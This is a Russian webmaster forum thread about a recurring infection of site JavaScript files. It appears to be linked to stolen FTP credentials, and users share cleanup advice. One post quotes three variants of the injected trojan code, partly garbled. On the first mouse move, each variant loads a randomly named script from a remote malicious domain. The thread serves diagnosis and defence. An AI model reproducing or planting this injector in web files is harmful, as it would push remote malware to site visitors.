На сайте обнаружен потенциально опасный код

Проверьте вот этим сервисом это лучшее что я нашёл в интернете http://antivirus-alarm.ru/

чо за пиар? сначала пусть работать начнет ваш суперсевис (

беру слова назад. Хороший сервис.

---------- Добавлено 11.04.2012 в 13:03 ----------

помогло, нашел то что не видел

Такая проблема.

Ставлю чистый движок, базу. Купил лицензию, заливаю ЧИСТЫЙ шаблон, картинки и делаю запрос к базе на востановление новостей и категорий. ВСЕ ЧИСТО! Но через пару часов заражены те же файлы и около 100 троянов на сайте! Как такое может быть? Антивирус дле молчит. Что делать? Я уже и хостинг поменял, уже голова кругом от этого...

фтп пароль менять и в тоталах не хранить.

проверить свой комп лицензионным ПО

чудес не бывает..

ФТП только один, вчера новый хостинг купил. В тоталах не хранил, ввожу только вручную в FileZile.

Сейчас купил и поставил antivirus kaspersky internet security 2012, нашел вместо 99 (как раньше) троянов только 5 в js файлах шаблона. Все файлы снес, кроме 1. Который остался - почистил. Теперь угроз не обнаружено, но чувствую опять повторится через пару часов...

В общем помогу всем и дам почву на размышление

В течении пары месяцев с интервалом ~1 месяц идет заражение моих сайтов.

Заражают его трояном(js:redirector[pm]) цепляясь кодом к концу каждого *.js.

после обфускации коды выглядят так

(function (){

var url = 'h5p://32uq7e.iwygfwyemr.game-server.cc/g/';

if (typeof window.xyzflag === 'undefined'){

window.xyzflag = 0;

}

? ??? ?? ? ??? ?? ????? ? ?? ?? ? ? ??? ??? ? ?

??? ? ? ? ? ??? ????? ? ?? ??? ?? ?? ?? ??? ? ? ??

?? ??????? ? ??? ? ?? ??? ?? ? ??? ?? ? ??? ? ??

?? ??? window.xyzflag = 1;

var head = document.getElementsByTagName('head')[0];

var script = document.createElement('script');

script.type = 'text/javascript';

script.onreadystatechange = function (){

if (this .readyState == 'complete'){

window.xyzflag = 2;

}

}

;

? script.onload = function (){

window.xyzflag = 2;

}

;

script.src = url + Math.random().toString().substring(3) + '.js';

head.appendChild(script);

}

}

;

}

)();

(repeated 1 time)

-------------------------------

(function (){

var url = 'http://229ue.thnbpgmyys.dyndns-mail.com/g/';

if (typeof window.xyzflag === 'undefined'){

window.xyzflag = 0;

}

document.onmousemove = function (){

if (window.xyzflag === 0){

window.xyzflag = 1;

var head = document.getElementsByTagName('head')[0];

var script = document.createElement('script');

script.type = 'text/javascript';

script.onreadystatechange = function (){

if (this .readyState == 'complete'){

window.xyzflag = 2;

}

}

;

script.onload = function (){

window.xyzflag = 2;

}

;

script.src = url + Math.random().toString().substring(3) + '.js';

head.appendChild(script);

}

}

;

}

)();

(repeated 1 time)

(function (){

var url = 'http://yyzola.gpbbsdhmjm.shacknet.nu/g/';

if (typeof window.xyzflag === 'undefined'){

window.xyzflag = 0;

}

document.onmousemove = function (){

if (window.xyzflag === 0){

window.xyzflag = 1;

var head = document.Y_](Y ^ `Z[Y(ZZ[(Z[ZY_`(Y__Y]a(ZY \ Z \ [(XYZ ^ Y \ _(Y ^^

Y ^ ]Z]Z(YaY(YaX(Z]](Z]Z(Z \ `(Z]YY]](Y]_(ZX_(Y ^\ (ZXaYZ](YZ \ (YZ \ (YZ \ (Z

[[(ZYZ(ZZaY[_Y[ \ Y[ \ Z \ ZY``(X(YYZY \ ZZX(ZYZZYY(ZZXZX ^ Z \ [YaaY \\

ZYZ]Y]a(Ya`(YaY(YaaY[ \ (Y \ XY \ Z(Y \ YYaXYa_Y][Z \ a(Z]YY`X(Y[ \ ZX`(

ZX_Y ^\ Y`]Z[_(ZZ`(Z[](Z[a(Y ^ aZ[ ^ (ZZ](Y] ^ (Y`](Y] ^ Y_Y(Y] ^ Y ^ ]Z \ Z

YaYY`_(ZX`(Y`_(ZX]Y ^^ (Y`YZZX(ZZ \ Z \ `ZZa(ZZ ^ ZX_Y`Y_`(Y ^ aY[Z(Y[ ^

ZX ^ (ZYX(Ya_YZ](Y \^ (Y \ X(Y \ YY \ YZYX(ZX`ZX ^ Y][(Y \^ Y[ \ Y[_Y_YY ^

]Y]_Z[]ZZZ(ZYY(ZY_(ZY ^ Z \ _YaX(YaY(Y`Z ??? if (this .readyState ==

'complete'){

window.xyzflag = 2;

}

}

;

script.onload = function (){

window.xyzflag = 2;

}

;

script.src = url + Math.random().toString().substring(3) + '.js';

head.appendChild(script);

}

}

;

}

)();

----

Что удалось выяснить, балуется этим какой то западный товарищь, после заражения были заходы с турецкого ip и куча с голландии. Хотя какой там балуется, тут идет плановое(автоматическое) заражение всех сайтов(у меня joomla везде, версии разные от 1.0.15 до 1.5) без разбора, активность судя по сообщениям данное заражение началось с начала марта.

После первого заражения компьютера(стоял серверный антивирус какой-то-пропустил), и ее лечения drweb, в ход пошел касперский, после этого систему пришлось переставлять(окна ie и мозилла) закрывались автоматом.

Кроме паролей от ftp другие данные не использовались, похоже товарищь планомерно делает ботнет сеть.

--------

если у Вас антивири не нашли вирусню, откройте любой js из страницы которую указал Яндекс и Вы найдете в конце файла eval(... длинную строчку.

---

Что я сделал, почистил все+ отключил вообще ftp(на firstvds нашел что так можно, а когда понадобится врублю)

Похожая проблема.

Однажды пришло письмо от одного хостера, что поменяли пароли на ftp в связи с активностью вирусов. Я все проверил, ничего не нашел. Успокоился.

Через неделю с другого хостинга на все сайты начал визжать Dr.web. Так же они оказались закрыты яндексом для доступа из поиска.

Проверил- все *.js с вирусом. Пришлось все удалять и перезаливать из бекапов.

Сам виноват. Пароли хранил в FileZille. Антивирь Dr.Web.

На одном сайте бекапа свежего небыло. Пришлось химичить. Почистил все js. Яндекс всеравно его не выпускает. Диагноз в вебмастере -"Поведенческий анализ". Никак эту заразу не отловлю вроде все проверил.... Может подскажите чего? Двигло Drupal.

читайте топик сначала, или вам снова все повторить?

Мда. Снова пришло письмо от яндекса. Проверил антивирусом, разными сервисами - сайт чист. Как такое может быть?